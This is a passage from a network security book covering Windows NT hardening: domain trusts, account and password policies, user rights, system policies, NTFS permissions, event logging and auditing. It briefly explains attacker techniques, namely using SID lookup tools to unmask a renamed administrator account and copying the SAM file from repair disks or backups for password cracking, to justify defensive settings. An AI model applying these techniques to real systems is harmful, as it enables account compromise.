also help to ease administration. So when should domain trusts be used? A good example is shown in Figure \n14.1. \n \nFigure 14.1: A network that is a domain trust candidate \nThis environment maintains a number of NT PDC and BDC servers. There are also a number of Lotus Notes \nservers, which are also running on Windows NT. This network is managed by two different support groups. One \ngroup is responsible for all Lotus Notes activity (databases, e-mail, and so on), while the other group is responsible \nfor all other network functions. \nThe problem is that the general support group does not want the Notes group to have administrator access to the \nentire network. This is understandable—it would grant members of the Notes group access to areas of the network \nwhere they do not need to go. The Notes group members claim they must be granted full administrator rights in \norder to do their jobs effectively. Unless they have full administrator access to the Notes servers, they cannot \nproperly manage the systems. \nThe solution is to make the two Notes servers a PDC and a BDC of their own domains. This secondary domain \ncan then be configured to trust the primary domains. This is shown in Figure 14.2. The resulting trust relationship \nallows the Notes group to be granted administrator-level access to the two Notes servers without having \nadministrator-level access to the rest of the network. This trust relationship also allows administrators of the \nprimary domain to retain their level of access in the secondary domain. \n" }, { "page_number": 276, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 276\n \nFigure 14.2: A trust relationship \n \nUser Accounts \nUser accounts are managed with the User Manager for Domains utility, which can be accessed from the \nAdministrative Tools program group. The User Manager for Domains utility is shown in Figure 14.3. This tool \nallows you to add and remove users, assign groups, and define account policies. All user access attributes are \nmanaged through this interface except for file, directory, and share permissions. File system permissions are set \nthrough Windows NT Explorer. \nYou can use the User Manager for Domains utility to manage both local and domain accounts. Every NT system, \nboth server and workstation, has local accounts that must be managed outside of the domain. In order to manage \nlocal accounts from the NT system itself, you must disconnect from the domain and connect to each system. You \ncan also remotely manage local accounts by selecting User ¾ Select Domain from the User Manager for Domains \nutility and entering a system name instead of a domain name. \n \nFigure 14.3: The User Manager for Domains utility \nTip \nUpdating the local Administrator password on multiple NT systems can be quite a chore. \nGroup23 has made a Perl script available for automating this task. The script can be found \nat www.emruz.com/g23/. \nWorking with SIDs \nA Security Identifier, or SID, is a unique identification number that is assigned to every user and group. The \nformat of a SID is as follows: \nS-Revision Level-Identifier Authority-Subauthority \nThe initial S identifies this number as a SID. For a given domain, all values are identical for every user and group, \nexcept for the subauthority. The subauthority provides a unique number to distinguish between different users and \ngroups. There are a number of subauthority numbers that are referred to as well-known SIDs. This is because the \nsubauthority number is consistent in every NT domain. For example, the Administrator account will always have a \nsubauthority value of 500. This information can be used by an attacker in order to help target certain accounts for \nattack. \n" }, { "page_number": 277, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 277\nNote \nMicrosoft Knowledgebase document Q163846 lists all well-known SID numbers, along \nwith their associated accounts. \nExploiting Well Known SIDs \nMicrosoft, as well as many security consultants, recommends that you rename the NT administrator account. The \nlogic is that if an attacker does not know the logon name being used by the administrator, the attacker will not be \nable to compromise this account. A set of utilities written by Evgenii Rudnyi, however, shows just how easy it can \nbe to circumvent this attempt at security through obscurity. \nFigure 14.4 shows Rudnyi’s two utilities in use. The first, user2sid, allows you to input a user or group name and \nproduce the SID for this account. As mentioned, the SID is identical for every account except for the subauthority \nkey. By using the second utility, sid2user, we can substitute the well known SID number we wish to look up (such \nas 500 for the administrator account). As shown in Figure 14.4, the administrator account has been renamed to \nAdmin_renamed. Through this quick check, we now know which account to target. \n \nFigure 14.4: The user2sid and sid2user utilities \nNote \nRudnyi’s SID utilities can be downloaded from www.ntbugtraq.com. \nTip \nRenaming the administrator account would provide little help in protecting this system. A \nbetter tactic would be to ensure that the administrator account is using a strong password \nand that all failed logon attempts are logged. \nThe Security Account Manager \nThe Security Account Manager (SAM) is the database where all user account information is stored. This includes \neach user’s logon name, SID, and an encrypted version of each password. The SAM is used by the Local Security \nAuthority (LSA), which is responsible for managing system security. The LSA interfaces with the user and the \nSAM in order to identify what level of access should be granted. \nThe SAM is simply a file that is stored in the \\WinNT\\system32\\config directory. Since the operating system \nalways has this file open, it cannot be accessed by users. There are a number of other places where the SAM file \ncan be located, however, that you need to monitor carefully: \n\\WinNT\\repair This directory contains a backup version of the SAM file stored in compressed \nformat. At a minimum, it will contain entries for the administrator and guest accounts. \nEmergency repair disks When you create an emergency repair disk, a copy of the SAM is saved \nto floppy. \nBackup tape An NT-aware backup program will be capable of saving the SAM file. \nIf an attacker can get access to the SAM file from one of these three places, the attacker may be able to \ncompromise the system. \nNote \nIn Chapter 16, we will look at how a brute force attack can be launched against the SAM \nfile in order to recover account passwords. \nConfiguring User Manager Policies \nNT provides a number of settings that allow you to define a user access policy. The settings are broken up over \ntwo utilities. Account properties and user access rights are set through the User Manager for Domains utility. \n" }, { "page_number": 278, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 278\nDesktop customization is enforced through User Manager, but policies are created through the System Policy \nEditor. \nAccount Policies \nAccount policies are set through User Manager by selecting Policies ¾ Account. This produces the Account \nPolicy window shown in Figure 14.5. The Account Policy window allows you to customize all settings that deal \nwith system authentication. These settings are global, meaning that they affect all system users. A brief \nexplanation of each option follows. \n \nFigure 14.5: The Account Policy window \nMaximum Password Age This setting determines the amount of time before a user is forced to change his \npassword. Too long of a period of time can be considered a security risk, while too brief of a period of time may \nprompt a user to write down his password. Typically, a maximum password age of 30–90 days is considered \nacceptable. \nMinimum Password Age This setting determines the amount of time that must pass before a user is allowed to \nchange her password. When prompted to change their passwords, some users like to make repetitive password \nchanges in order to cycle past the Password Uniqueness value. This allows the user to exceed the history setting \nand reset her password back to the current value. By setting a minimum password age, you can prevent users from \nreusing the same password. A value of three to seven days is usually sufficient to deter this user activity. \nMinimum Password Length This setting determines the smallest acceptable password. Due to vulnerabilities in \nthe LanMan password hash that we will discuss in Chapter 16, it is suggested that you use a minimum value of \neight characters for passwords. \nPassword Uniqueness This setting allows you to configure how many previous passwords the system remembers \nfor each user. This prevents a user from reusing an old password for the number of password changes recorded in \nthis setting. Typically, you want to combine this setting with the Maximum Password Age value so that users will \nnot use the same password more than once per year. \nAccount Lockout The Account Lockout setting defines how many logon attempts a user is allowed to try with an \nincorrect password before the account becomes administratively locked. This setting is used to prevent attackers \nfrom attempting to guess the password for a valid user account. Usually five or six attempts is a good balance \nbetween not giving an attacker too many tries at an account and giving the user a few attempts at getting his \npassword right. \nReset Count After This setting defines the period of time in which a number of bad logons are considered to be \npart of the same logon attempt. For example, if the Account lockout setting is set to five attempts and the Reset \ncount after setting is set to 30 minutes, the system will only lock the account if five failed logon attempts occur in \na 30-minute period. After 30 minutes, the counter is reset and the next failed logon is counted as attempt number \none. Depending on your environment, you may want to set this value as low as 30 minutes or as high as one day. \nLockout Duration If an account does become locked due to an excessive number of logon attempts, the Lockout \nDuration setting defines how long the account will remain locked. For high-security networks, you should set this \nvalue to Forever. This leaves the account locked until it is reset by the system administrator. This allows the \nadministrator to investigate whether the lockout is due to an intruder or to a user who cannot remember her \npassword. \nFor many environments, a lockout setting that enables the account after a specific period of time is sufficient. This \nis useful when a user locks her account and the administrator is not available to clear the lockout. It is also useful \nfor preventing DoS attacks. An attacker could purposely attempt multiple logons with a bad password in order to \n" }, { "page_number": 279, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 279\nlock out the legitimate user. By setting a duration, the account would be able to clear itself without administrator \nintervention. \nForcibly Disconnect Remote Users When time restrictions are used, this setting will disconnect all users who do \nnot log off when the time restriction expires. This is useful to ensure that users do not remain logged on after \nbusiness hours, thus giving an attacker an active account to work with. \nTip \nThis setting is also useful to ensure that all document files are closed so that a proper \nbackup can be performed. \nUsers Must Log On in Order to Change Password In a Windows environment, users can change their \npasswords locally and then later update the server with these password changes. This setting means the user can \nonly change his password during an authenticated session with the domain. This ensures that an attacker cannot \nuse a local vulnerability in order to modify a password throughout an NT domain. \nIncreasing Password Security with passfilt.dll \nWithin Service Pack 2 and later, Microsoft has included the passfilt.dll file. This file allows you to increase you \npassword security by challenging a user’s password to meet more stringent criteria. The passfilt.dll file performs \nthe following checks: \nƒ \nPasswords must be six characters or greater. \nƒ \nPasswords must contain a mixture of uppercase, lowercase, numeric, and special \ncharacters (at least three of the four categories are required). \nƒ \nPasswords cannot be a variation of your logon name or full username. \nYou can use Account Policies to require a longer password, but you cannot specify a shorter one. The domain \nadministrator is able to override these settings on a user-by-user basis. This is done by managing the specific user \nwith User Manager and setting a specific password in the password field. This password will not be subjected to \npassfilt.dll. \nTo implement passfilt.dll, edit the Registry key \nHKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\LSA\\ \nNotification Packages \nand add the character string PASSFILT. Do not delete the existing key value. \nUser Rights \nUser rights are set through the User Manager by selecting Policies ¾ User Rights. This produces the User Rights \nPolicy window shown in Figure 14.6. User rights allow users or groups to perform specific actions on the server. \nThe right is selected from the Right drop-down menu, while the Grant To box identifies which users and groups \nhave been granted this right. Checking Show Advanced User Rights causes the Right drop-down menu to display \nadditional options. Some of the more important rights are described in the sections that follow. \n \nFigure 14.6: The User Rights Policy window \nAccess This Computer from the Network This right defines which domain users are able to remotely \nauthenticate with each of the servers within the domain. This right applies to all domain servers—not just this \nspecific server, as the name implies. \nTip \nInstead of renaming the administrator, create a new account that is an administrator \nequivalent and use this account for managing the domain. This will allow you to remove the \nAccess this Computer from the Network right from the administrator account. The \nadministrator will still be able to log on from the console, just not over the network. If you \nalso log failed logon attempts, you will be able to see when someone is trying to break in to \nyour domain as administrator. \nBackup Files and Directories This right supersedes all file permission settings and allows the users with this \nright assigned to have read access to the entire file system. \nWarning \nBackup Files and Directories is a dangerous right, because it gives the user \naccess to the entire system without being flagged as an administrator \nequivalent. This right would allow a user to copy the SAM in order to run it \nthrough a password cracker. \n" }, { "page_number": 280, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 280\nBypass Traverse Checking An advanced user right, Bypass Traverse Checking allows a user to navigate the file \nsystem regardless of the permission levels that have been set. File permissions are still enforced; however, the user \nis free to wander through the directory structure. \nLog On Locally When managing a domain, this right defines who is allowed to log on from the PDC or BDC \nconsole. You may wish to limit console access to only administrator-level accounts. This can help to deter (but not \ncompletely prevent) physical attacks against the server. Like the Access this Computer from the Network right, \nyou can use failed logon attempts to track whether any of your users have sneaked into the server room and \nattempted to access the server directly. \nManage Auditing and Security Logs If file and object auditing has been enabled, this right defines which users \nare allowed to review security logs and specify which files and objects will be audited. \nWarning \nBe careful whom you grant this right to—an attacker can use this right to \ncover his tracks once he has penetrated a system. \nPolicies and Profiles \nPolicies allow you to control the functionality of the user’s workstation environment. This can include everything \nfrom hiding the Control Panel to disabling the ability to run programs that are not part of the Desktop. Policies can \nbe set up globally for a domain, or they can be applied to specific users or groups. \nProfiles allow you to customize the look and feel of a user’s Desktop. You do this by authenticating to the domain \nusing a special account and laying out the Desktop environment in exactly the way you want it to appear to your \nend users. This can include special program groups or even a choice of color schemes and screen savers. There are \na number of ways to implement profiles: \nMandatory profile Absolute enforcement of the Desktop environment. Mandatory profiles are \nloaded from the server and do not allow any customization. If the user changes her Desktop \nenvironment, it will be reset at her next logon. \nLocal profile A customizable profile that is stored on the local machine. If the user authenticates \nfrom a different workstation, his Desktop environment may appear different. \nNetwork profile Also referred to as a roaming profile. Network profiles allow the user to receive her \nDesktop settings from any network workstation. Network profiles can be mandatory or \ncustomizable. \nPolicies are useful for deploying a security policy. For example, if your policy states that users are not allowed to \nload software programs onto the system, policies can remove the tools required to run the Setup program of a new \nsoftware package. Profiles are more of a management tool, as they allow you to implement a standard Desktop. \nUsing Policies \nPolicies are created using the System Policy Editor located within the Administrative Tools program group. The \nSystem Policy Editor is shown in Figure 14.7. From the NT server, you can only create policies that will be \napplied to other NT systems. If you wish to create policies for Windows 95/98 systems, you must copy the \nPoledit.exe file from the WinNT directory to a Windows 95/98 machine. You must then run the Policy Editor \nfrom the Windows 95/98 system. \nNote \nThe Policy Editor must be run on the operating system for which you wish to create a \npolicy. \n \nFigure 14.7: The System Policy Editor \nThe Policy Editor allows you to control the functionality of the user’s workstation environment. This can be done \nby system, by user, or by groups of users. The default settings for the Policy Editor allow you to create a policy \n" }, { "page_number": 281, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 281\nthat will be defined for all systems and all users. If you wish to create a more granular environment, you can use \nthe Edit menu to define additional systems, groups, or users. \nThe policy in Figure 14.8 is made up of four groups: \nƒ \nDomain Guests \nƒ \nDomain Admins \nƒ \nDomain Users \nƒ \nPower Users \n \nFigure 14.8: A sample policy \nThese groups allow you to customize the Desktop based on the level of access granted to each group member. For \nexample, Domain Guests could have their Desktop environment stripped clean, while Domain Admins enjoy \naccess to all Desktop functions. The Domain Users and Power Users groups could be permitted a level of Desktop \nfunctionality that falls in between Domain Guests and Domain Admins. This lets you define multiple levels of \nDesktop access. \nMachine Policies \nTo configure machine policies, double-click the machine object you wish to manage. This will produce the \nComputer Properties window shown in Figure 14.9. By navigating the structure, you can enable policy settings \nthat will be enforced either on all machines (if the default policy is modified) or on specific machines (if you \nselect Edit ¾ Add Computer). Some of the more useful machine policy settings you are allowed to configure are \nlisted here. \n \nFigure 14.9: The Computer Properties windows for the default computer policy \nEnable SNMP updates This setting allows the system to transmit SNMP updates to an SNMP \nmanagement console. \nRun This setting determines which programs should be run during system startup. \nSharing This setting determines whether administrative shares should be created. \n" }, { "page_number": 282, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 282\nCustom shared folders This setting determines whether shared program groups can be created on \nthe system. \nLogon Banner This setting defines a logon banner. This is useful for displaying corporate policies \nregarding system access. \nShutdown from Authentication Box This setting determines whether the shutdown option is \navailable from the logon authentication screen. This allows a user to shut down the system without \nfirst authenticating with the system. The default is to have this option disabled. Selecting this box \nenables the shutdown option. \nDo not display last logon name Selecting this option causes the last logon name not to be filled in. \nBy default, Windows remembers the last user who performed a system logon and fills in the logon \nname field of the authentication window. \nUser and Group Policies \nTo configure user or group policies, double-click the object name that you wish to manage. This will produce the \nProperties window shown in Figure 14.10. Some useful policy settings follow: \n \nFigure 14.10: The Properties window for the default user policy \nRemove Run command Prevents a user from selecting Start ¾ Run from the Taskbar \nRemove folders from Settings Prevents a user from selecting Start ¾ Settings in order to modify \nthe system configuration \nRemove Find command Prevents a user from selecting Start ¾ Find, which prevents the user from \nsearching the local drives \nHide drives in My Computer Prevents a user from browsing local or mapped drives using the My \nComputer icon \nHide Network Neighborhood Prevents a user from browsing the network \nDisable Registry editing tools Prevents a user from modifying the Registry keys \nRun only allowed Windows applications Allows the administrator to define which applications \ncan be run by the user \n" }, { "page_number": 283, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 283\nEnabling Policies \nOnce you have created your policy, enable it by saving the policy to the NETLOGON share. The NETLOGON \nshare is in the \\WinNT\\System32\\Repl\\Import\\Scripts directory. The policy must be copied to the NTLOGON \nshare of every PDC and BDC. \nTo apply a policy to all NT systems, save the policy under the name Ntconfig.pol. If you created a policy that will \nbe applied to Windows 95/98 users, save the policy using the name Config.pol and copy this file to the \nNETLOGON share, as well. When a Windows system authenticates with a domain, it looks for these specific files \nto see if a policy has been enforced. Windows NT systems specifically look for the file Ntconfig.pol, while \nWindows 95/98 systems are configured to look for the file Config.pol. \n \nFile System \nNT Server supports two file systems: FAT and the NT file system (NTFS). While both support long filenames, \nFAT is optimized for drives up to 500MB, while NTFS is designed for drives of 500MB and larger. NTFS is the \npreferred file system for storing applications and user files. This is because it supports file and directory-level \npermissions while FAT does not. \nNote \nRecovering deleted files is only supported under the FAT file system. NT provides no \ntools for recovering files remotely deleted from an NTFS drive. \nPermissions \nThere are two types of permissions that can be associated with files and directories. These are share permissions \nand file permissions. Share permissions are enforced when users remotely attach to a shared file system. When a \nuser attempts to access files through a share, the share permissions are checked to see if the user is allowed access. \nFile permissions are access rights that are assigned directly to the files and directories. Unlike share permissions, \nfile permissions are enforced regardless of the method used to access the file system. This means that while a user \nwould not be subjected to share permissions if he accessed the file system locally, he would still be challenged by \nthe file-level permissions. \nNote \nThis distinction is important when you start setting permissions for services such as your \nWeb server. Access permissions for a Web server are only regulated by file-level \npermissions. Share permissions have no effect. \nWhen accessing a share over the network, permissions are cumulative. This means that a user is subjected to the \nstrictest level of access. For example, if a remote user has Full Control access set as a file permission but only has \nRead access to a share, that user will only be allowed Read access. \nShare Permissions \nShare permissions are set through Windows Explorer. Right-click the directory name that you wish to set share \npermissions on and select the Sharing menu option. This produces the Shared Documents Properties window \nshown in Figure 14.11. \n" }, { "page_number": 284, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 284\n \nFigure 14.11: Sharing properties for the Shared Documents directory \nNotice that there is also a tab marked Security. This is for setting file-level permissions, which we will discuss in \nthe next section. \nSelecting the Permissions button in the Shared Documents Properties window produces the Access Through Share \nPermissions window shown in Figure 14.12. Notice that the default is to give Everyone Full Control access to the \nshare. \nTip \nMicrosoft file sharing always grants full access to everyone. You should make a habit of \nreviewing the share permission level and reducing the level of access whenever possible. \n \nFigure 14.12: The Access Through Share Permissions window \nAccess levels are set by associating different groups or specific users with certain share permissions. This defines \nwhat level of access each user or group will have when attempting to access this specific share. Only four possible \nshare permissions can be assigned: \nNo Access No access to the share is permitted. \nRead The user or group may navigate the directory structure, view files, and execute programs. \nChange The user or group has Read permissions and can add or delete files and directories. \nPermission is also granted to change existing files. \nFull Control The user or group has Change permissions, and can also set file permissions and take \nownership of files and directories. \n" }, { "page_number": 285, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 285\nA more appropriate set of share permission than the default setting is shown in Figure 14.13. In this configuration, \nEveryone has No Access rights by default, because they are not listed on the Access Control List. A user who is \npart of the Domain Users group is allowed Change-level access. Finally, Domain Admins are allowed Full Control \nof the share. This allows the Domain Admins to perform any required administrative functions. \n \nFigure 14.13: Some suggested share permissions \nTip \nWhen modifying share permissions, always add permissions for the Domain Admins first. It \nis possible to configure a share so that the domain administrators have no access rights! \nOnce you have configured your share permissions, click OK to save your changes. Make a habit of checking these \npermission levels twice before leaving this screen. Share permissions take effect immediately and will affect any \nfuture users who try to access the share. \nFile Security \nFile permissions are also set by right-clicking a directory name within Explorer and opening the Properties \nwindow. This time, however, you want to select the Security tab. This produces the window shown in Figure \n14.14. This window has three buttons thats allow you to work with file permissions, auditing, or file ownership. \n \nFigure 14.14: The Security tab of the Shared Documents directory \nThe Permissions Button \nFile and directory permissions are modified by selecting the Permissions button from the Security tab. This \nproduces the Directory Permissions window shown in Figure 14.15. As you can see from this screen, working \nwith file and directory permissions is very similar to working with share permissions. The only difference is that \nyou have a few more options here. \n" }, { "page_number": 286, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 286\n \nFigure 14.15: The Directory Permissions window \nThere are two checkboxes at the top of the screen. Since you are working with a directory instead of a share, the \nsystem realizes that you may wish to apply your security changes to all objects within the directory. If only the \nReplace Permissions on Existing Files option is checked, the permissions are applied to files within this directory \nonly. The Replace Permissions on Subdirectories option allows this permission change to be recursively applied to \nall files and directories located below the current location. If neither box is checked, the permissions are applied to \nthe directory only and no other directories or files are updated. \nLike share permissions, file or directory permissions are set by associating a user or group with a specific level of \naccess. When working with directory permissions, you have seven permission levels available. This allows a bit \nmore granularity when setting access permissions. The permission settings are \nNo Access No access to the directory is permitted. \nList The user or group may navigate the directory structure and see listed files. This setting does \nnot provide the user or group any file access beyond seeing the file’s name. \nRead The user or group has List permissions, can view files, and can execute programs. \nAdd The user or group has List permissions and can add files and directories. Files cannot be \nviewed or executed. \nAdd & Read This setting combines the permissions of Read and Add, so that files can be viewed \nand added but not deleted or changed. \nChange The user or group has Add and Read permissions and can delete files and directories. \nExisting files can also be changed. \nFull Control The user or group has Change permissions and can set file permissions and take \nownership of files and directories. \nSpecial Access This setting allows you to specify the exact right assigned to files or directories. \nOptions are Read, Write, Execute, Delete, Change Permissions, or Take Ownership. This is useful \nfor those unique cases when the generic groups will not suffice. For example, setting the Execute \npermission for a file will allow a user to run the program without having access to view the \ndirectory. \nAs with share permissions, you should decide on the minimum level of access required by each user or group and \nset permissions accordingly. \n" }, { "page_number": 287, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 287\nThe Auditing Button \nAuditing allows you to monitor who is accessing each of the files on your server. Clicking the Auditing button in \nthe Properties window produces the Directory Auditing window shown in Figure 14.16. From this window, you \ncan select specific users and groups and define the activity you wish to record. For example, in Figure 14.16 we \nare auditing the directory for ownership and permission changes. \n \nFigure 14.16: The Directory Auditing window \nIn order to use this feature, you must also launch the User Manager and select Policies ¾ Audit. Auditing must be \nenabled and the File and Object Access option must be selected. All audit entries will be reported to the Security \nlog in Event Viewer. \nNote \nAuditing is discussed in greater detail in the “Logging” section of this chapter. \nThe Ownership Button \nClicking the Ownership button from the Properties window allows you to take ownership of a file or directory \nstructure. Domain administrators are always allowed to take ownership (provided they have full control of the file \nor directory). If full control is enabled for domain users, they can designate other domain users who can take \nownership of files or directories they own. \n \nLogging \nAll NT events are reported through Event Viewer. Access Event Viewer through the Administrative Tools \nprogram group. By default, only system and application messages are logged. You can, however, enable auditing, \nwhich provides feedback on a number of security-related events. This provides a greater level of detail about what \nis taking place on the system. \nConfiguring Event Viewer \nThere are a few settings within Event Viewer that you may wish to change. From the Event Viewer main menu, \nselect Log ¾ Log Settings. This will produce the Event Log Settings window shown in Figure 14.17. The Change \nSettings for drop-down menu allows you to configure the System, Application, and Security logs separately. You \ncan also set the maximum size of the log as well as specify what Event Viewer should do if the log grows too \nlarge. \n" }, { "page_number": 288, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 288\n \nFigure 14.17: The Event Log Settings window \nTip \nGiven the price of disk space, the default log size setting of 512KB is far too small. Event \nViewer keeps track of important events. You want to make sure that you provide enough \nspace to record them. Increase the log size of all three logs to 4098KB. This will use a \nmaximum of 12MB of disk space for log entries—a small price to pay for keeping tabs on \nyour system’s health. \nThe default setting for Event Log Wrapping is also a problem. What happens if you find out that your system was \ncompromised at some time over the last 60 days? If you are overwriting events after seven days, you have no real \nhistory to go through in order to track what has happened. Change this setting to Do Not Overwrite Events for all \nthree logs. This will produce a console error if the log file should become full, but it is better than losing your log \nhistory. \nReviewing the Event Viewer Logs \nYou should plan on reviewing your logs on a regular basis. This is one of your best tools for determining whether \nsomeone has infiltrated your system. The logs show you what has gone on with your system when you were not \nthere to watch it. Depending on your setup, you can choose from a number of manual and automated methods for \nreviewing log entries. \nManual Log Review \nOne of the simplest methods of reviewing your logs is to simply log on to each system from the console and \nreview the log entries. If you have only one or two servers, this may be sufficient. Logs can be archived by simply \nselecting Log ¾ Save As from the Event Viewer window and saving each log to file. You may wish to save the \nlogs as a .TXT file so that they can be imported into another program, such as Excel or Access, for further review. \nIf you will be transporting the files via floppy disk, consider compressing them first. You can easily fit 12MB \nworth of logs onto a floppy in PKZIP format. \nIf you are managing 10 or more NT systems, it may not be practical to walk around to every system. When this is \nthe case, you can select Log ¾ Select Computer from the Event Viewer main menu. This produces the Select \nComputer dialog box shown in Figure 14.18. From this screen you can select any Windows NT system and \nremotely view the Event Viewer log. This is extremely useful because it allows you to monitor all of your logs \nfrom a central location. It even allows you to save the logs locally, making log archiving a single-step process. \n \nFigure 14.18: The Select Computer dialog box \nTip \nIf your desktop system is Windows 95/98, you can still view Event Viewer log entries \nremotely. You simply need to acquire the NT Administration tools for Windows 95/98. \nThis is a self-extracting executable named nexus.exe that includes Event Viewer, User \nManager, and Server Manager for Windows 95/98. All of these tools can be used to manage \nan NT domain from a Windows 95/98 system. The nexus.exe archive can be found on the \nMicrosoft Web site. \n" }, { "page_number": 289, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 289\nAutomated Log Review \nIf you have hundreds or thousands of NT systems to monitor, manually reviewing all of the Event Viewer logs is \nout of the question. If you have many systems to review, you need to automate the process. Automating the log \nreview process allows you to search the Event Viewer logs in order to see if anything interesting has happened on \nthe system. If an interesting entry is found, the log can be flagged so that the system administrator knows that the \nlog is in need of further review. Automating the log review process can drastically reduce the amount of human \nwork required to locate critical events. \nThe safest way to automate the review process is to transmit the log entries to a remote system. While this places \nlog information out on the wire, it also prevents attackers from being able to modify log entries on the \ncompromised system in order to cover their tracks. Elmar Haag has written a program that allows an NT system to \nforward its log entries to any UNIX system running syslogd. This consolidates the logs in a central location, where \nthey can be reviewed by an automated process. The syslogd client can be found at \nwww.centaur.de/~haag/logger_NT/. \nAuditing System Events \nTo enable auditing, launch User Manager and select Policies ¾ Audit. This will produce the Audit Policy window \nshown in Figure 14.19. For each of the listed events, you can select whether you wish to log event successes, \nfailures, or both. A description of each event follows: \nLogon and Logoff This event creates a log entry as users log on and log off the system. \nFile and Object Access This event creates a log entry when files or objects flagged as audited are \naccessed. Auditing was discussed earlier in this chapter. \nUse of User Rights This event creates a log entry whenever user rights are verified. Selecting this \nevent can create very large log files. \nUser and Group Management This event creates a log entry when user and group entries are \nadded, deleted, or modified. \nSecurity Policy Changes This event creates a log entry when security policies, such as group \nrights or audited events, are modified. \nRestart, Shutdown, and System This event creates a log entry when the system is restarted or \nshut down, or when the Security log settings are changed. \nProcess Tracking This event tracks application and service calls. Selecting this event can create \nvery large log files. \n \nFigure 14.19: The Audit Policy window \nDeciding What to Audit \nGiven the auditing choices available to you, you must now select which events you wish to monitor. The knee-jerk \nreaction is to monitor everything; however, this may not be practical. You need to balance the amount of detail \ncollected with the amount of time and resources you are willing to invest in reviewing the logs. If the logs will be \n" }, { "page_number": 290, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 290\nreviewed automatically, this may not be a problem. If you will be reviewing the logs manually, having Event \nViewer generate 20MB worth of log entries on a daily basis will not help you track what is going on with your \nsystem. \nThe key is to only track events that you deem critical to your environment’s security policy. For example, you may \nnot wish to sift through all of the successful logon events. Auditing this information may only help to create \nadditional log entries for you to filter through. You should, however, be interested in logon failures, as this may be \nan attacker’s first attempt at gaining system access. \nTip \nThe bottom line is to keep your log size manageable. It does absolutely no good to collect \nall this information if you are not going to review it to check for problems. \n \nSecurity Patches \nNT has suffered from a number of security vulnerabilities over the past few years. It is not \nuncommon to see two or three major security flaws exposed on a monthly basis. For this \nreason, it is important that you apply all security-related patches once they are known to be \nstable. Stability is usually determined within a few weeks. During this testing period, you may \nwish to consider testing the security patch on a nonproduction server. Microsoft has needed to \nrecall security patches in the past due to the problems they have created. \nWarning \nDo not apply a new security patch to a production server until you know it will \nnot cause a problem. \nAt the time of this writing, Service Pack 6a is the latest major patch release. SP6a is \nsignificant because it finally allowed NT 4.0 to be C2 certified. C2 certification is established \nthrough the National Computer Security Center (NCSC), a branch of the National Security \nAgency (NSA). C2 certification requires the following security features: \nMandatory user identification and authentication The ability of the system to identify \nauthorized users and to allow only them to access system resources. \nDiscretionary access control Users can protect information as they see fit. \nAuditing and Accountability Tracking and logging of all user resource access. \nObject Reuse The capability of the operating system to block user access to previously \nutilized resources. \nIn order to achieve C2 certification the NSA used these procedures: \nƒ Examination of source code \nƒ Examination of detailed design documentation \nƒ Retesting to ensure that any errors identified during the evaluation have been corrected \nTip \nIf you will be running Internet Information Server (IIS), there are a number of other \nsecurity patches you will want to install, as well. See the Microsoft Web site for the \nlatest list of available security patches. \n \nAvailable IP Services \nThis section lists available IP services that come with NT Server, along with a brief description of each. Figure \n14.20 shows the menu for adding more services. This menu can be accessed through the Network Properties \nscreen. The listed services are those that ship with NT Server. The Have Disk option can be used for adding IP \nservices created by third-party developers. \n" }, { "page_number": 291, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 291\n \nFigure 14.20: The menu for adding services to the NT Server \nComputer Browser \nWhen NetBIOS over IP is used, the computer browser creates and maintains a list of system names on the \nnetwork. It also provides this list to applications running on the system, such as the Network Neighborhood. The \ncomputer browser properties allow you to add additional domains to be checked for system names. \nDHCP Relay Agent \nWhen a DHCP client and server exist on two separate network segments, the DHCP relay agent acts as a proxy \nbetween the two systems. \nThe DHCP relay agent ensures that the client’s DHCP requests are passed along to the segment where the DHCP \nserver resides. In turn, it also ensures that the replies sent by the server make it back to the client. The benefit of a \nDHCP relay agent is that it removes the necessity of having a separate DHCP server on each logical network. The \nrelay agent can be located on the same network segment as the client or at the border between the client’s and the \nDHCP server’s network segments (acting as a router). \nThe DHCP relay agent requires that the IP protocol be installed. It also requires the IP address of at least one \nDHCP server. \nMicrosoft DHCP Server \nThe DHCP server allows the NT Server to automatically provide IP address information to network clients. When \na client sends out a DHCP request, it can receive all information required to communicate on an IP network, \nincluding an IP address, subnet mask, domain name, and DNS server. \nThe DHCP server requires that the IP protocol be installed. When the DHCP server is installed, it automatically \nadds a menu option for DHCP Manager to the Administrative Tools menu. \nMicrosoft DNS Server \nThe Microsoft DNS server allows the NT Server to respond to clients and other DNS servers with IP domain name \ninformation. When the DNS server is configured to use WINS resolution, host name information is provided by \nWINS, based on NetBIOS system names. \nA DNS server normally requires that host name information be manually maintained in a set of text files. If a \nmachine changes its IP address, the DNS tables must be updated to reflect this change. If DHCP is used to provide \nIP address information, DNS has no way of knowing which host names will be assigned to which IP address. \nBy using WINS resolution, the DNS server can query the WINS server for host information. The DNS server \npasses the query along to WINS, which uses its NetBIOS table to match an IP address to a host name. The WINS \nserver then returns this information to the DNS server. To a client querying a DNS server, the transaction is \ntransparent. As far as the client is concerned, the DNS server is solely responsible for responding to the request. \nThe two services do not need to be configured on the same NT Server. \n" }, { "page_number": 292, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 292\nThe DNS server requires that the IP protocol be installed. When DNS server is installed, it automatically adds a \nmenu option for DNS Manager to the Administrative Tools menu. \nMicrosoft Internet Information Server (IIS) \nThe Microsoft Internet Information Server adds Web, FTP, and Gopher functionality to the NT Server. Once \ninstalled, clients can access HTML pages, transfer files via FTP, and perform Gopher searches for files. Installing \nService Pack 3 will upgrade IIS to version 3.0. At the time of this writing, IIS 4.0 is the latest release for NT4.0. \nTo get IIS 5.0 you have to upgrade to Windows 2000. \nBy default, the IIS installation creates the directory InetPub, and places four directories inside it. The first three are \nthe root directories for each of the three servers. All files and directories 